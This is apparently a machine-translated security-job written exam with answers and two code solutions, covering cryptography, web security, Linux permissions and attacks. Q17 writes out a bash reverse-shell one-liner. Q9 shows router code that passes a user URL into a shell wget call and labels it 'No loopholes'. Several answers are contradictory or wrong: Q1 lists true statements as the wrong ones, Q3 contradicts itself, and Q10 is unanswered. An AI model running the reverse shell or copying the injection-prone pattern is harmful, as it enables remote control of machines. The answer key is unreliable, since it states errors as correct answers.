Mi 2019 Autumn Recruitment Safety Development Written Exam Questions (A)

1. What is wrong about the digital signature

Make sure that the message is indeed signed and sent by the sender
Digital signature can confirm the integrity of the message
The private key is used for signing and the public key is used for verification

2. What is the role of CORS?

Allow the client to get the data returned by the server

3. Which of the following statements about AJAX is correct?

AJAX can complete data cross-domain

What is wrong is:

AJAX can send data to different domains
AJAX can get data from different domains
AJAX uses synchronization technology

4. What is MD5?

Hash algorithm

5. In Linux, set the file attribute to the owner read-only, and the rest of the commands without any permissions are (assuming the file name is myfile)

chmod 400 myfile

6. Which of the following methods can not realize the monitoring of system network external connection behavior

View /var/log/lastlogrecords

Ways you can try:

Use hook technology to replace the c library function connect
Use auitd to monitor connect system calls

7. In the linux file system permissions (rwx), the value corresponding to the read-only permission is

supplement:

The first symbol represents the type of file
- If it is a normal file, it is "-",
- If it is a directory, it is "d",
- If it is a soft link, "l"
- If it is a character device, "c"
- If it is a block file, "b"
The first group represents the permissions owned by the file owner
- "x" means that the file has execute permission
- "r" means the file has read permission
- "w" means that the file has permission to modify
- "-" means that there is no other authority yet
The second group represents the permissions owned by the users of the group where the file is located
The third group represents the permissions owned by users in other groups
"rwx" permissions can also be expressed as numbers: r=4,w=2,x=1, so rwx=4+2+1=7

8. Upgrade package

Upgrade equipment used during the curl https://ota.a.com/update.bin -k -o /tmp/update.bincommand to get the upgrade package, the following statements is correct?

The upgrade package ignores certificate verification, which will cause a man-in-the-middle attack

9. What problems will the following code cause?

function upgradeRom()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local XQSysUtil = require("xiaoqiang.util.XQSysUtil")
    local url = LuciHttp.formvalue("url")
    url = url:gsub("'", "")
    if url
        XQFunction.forkExec(string.format("wget '%s'", url))
    else
        XQFunction.forkExec("/usr/sbin/crontab_rom.sh")
    end
end

No loopholes

10. What is the characteristic string at the beginning of the Linux executable file

11. The next statement is wrong

RSA and DSA have the same function, but different algorithms
Hash is reversible, Hash generally leads to a decrease in information entropy

12.What are the basic attributes of cookies?

Domain
path
httponly
secure
expires

13. Which of the following technologies are applied in https?

Symmetric encryption
Asymmetric encryption
Key exchange
Hash algorithm

14. Which of the following methods can generate cross-domain attacks?

CORS
windows.name
windows.postMessage

15. Which of the following methods are considered DDOS attacks

ICMP Flood
SYNFlood
DNSQuery Flood
UDPFlood

16. Regarding the SYNFlood attack, which of the following statements is correct is

This method does not need to establish a complete TCP three-way handshake
This type of attack is caused by the SYN semi-connection initiated by the client

17. Regarding this order, the correct statement is

bash -i >& /dev/tcp/192.168.1.2/8080 0>&1

By monitoring 8080 on 192.168.1.2, you can remotely operate the machine running this command
This is a reverse shell

18. Which of the following commands and tools are helpful for firmware analysis?

binwalk
file
firmware-mod-kit

19. What are the commonly used reverse analysis tools?

gdb
IDA
ollydbg

20. Which of the following are buffer overflow protection mechanisms?

PIE
NX
STACK CANARY

21, programming questions

Our classmate Xiao Qi is a very hard intern DBA. His daily job is to add authorizations to an account. Today, add authorizations to these 200 ipv4s, and delete these 200 authorizations tomorrow. One day, Xiao Qi When deleting the authorization, I accidentally deleted all the authorizations, and the leader gave me a lot of approval. After learning from the painful experience, Xiao Qi began to reflect on his daily work and found that it was nothing more than letting those IPs access the database every day. He decided to write a very efficient IP whitelist. Please help Xiao Qi to talk about the implementation ideas and use structured Programming language (c/c++/python/golang/java, etc.) write an ip whitelist, he needs this whitelist to have the function of adding ip, deleting ip, finding out whether the ip is in the whitelist, and printing the whitelist In the above four functions, the efficiency of finding whether the IP is in the whitelist must be high. And help Xiaoqi analyze the time complexity of each function, well written classmate Xiaoqi will invite you to dinner.

import java.util.HashSet;
import java.util.Scanner;
 
public class Main {
    
    
    public static void main(String[] args) {
    
    
        Scanner scanner = new Scanner(System.in);
        HashSet<String> set = new HashSet<>();
        while (!scanner.hasNext("end")) {
    
    
            String command = scanner.next();
            char c = command.charAt(0);
            String ip = command.substring(2);
            switch (c) {
    
    
                case 'i':
                    set.add(ip);
                    System.out.println("ok");
                    break;
                case 'd':
                    set.remove(ip);
                    System.out.println("ok");
                    break;
                case 's':
                    System.out.println(set.contains(ip));
                    break;
            }
        }
    }
}

There are N competition teams (1<=N<=500), the numbers are 1, 2, 3, in order. . . . , N plays the game. After the game, the referee committee will rank all participating teams from front to back, but now the referee committee cannot directly obtain the results of each team. It only knows the result of each game, that is, P1 wins P2. P1 and P2 indicate that P1 is before P2 in ranking. Now please program you to determine the ranking.

#include <bits/stdc++.h>
using namespace std;
int main(){
    
    
    int n,m;
    while(cin>>n>>m){
    
    
        vector<int> Edge[n+1];
        int inDegree[n+1];
        memset(inDegree,0,sizeof(inDegree));
        for(int i=0;i<m;i++){
    
    
            int a,b;
            cin>>a>>b;
            Edge[a].push_back(b);
            inDegree[b]++;
        }
        priority_queue<int, vector<int>, greater<int>> Q;
        for(int i=1;i<=n;i++)
            if(inDegree[i]==0)
                Q.push(i);
 
        int cnt = 1;
        while(!Q.empty()){
    
    
            int u = Q.top();
            Q.pop();
            if(cnt==n)
                cout<<u<<endl;
            else
                cout<<u<<" ";
            cnt++;
            for(int i=0;i<Edge[u].size();i++){
    
    
                int v = Edge[u][i];
                inDegree[v]--;
                if(inDegree[v]==0)
                    Q.push(v);
            }
        }
    }
    return 0;
}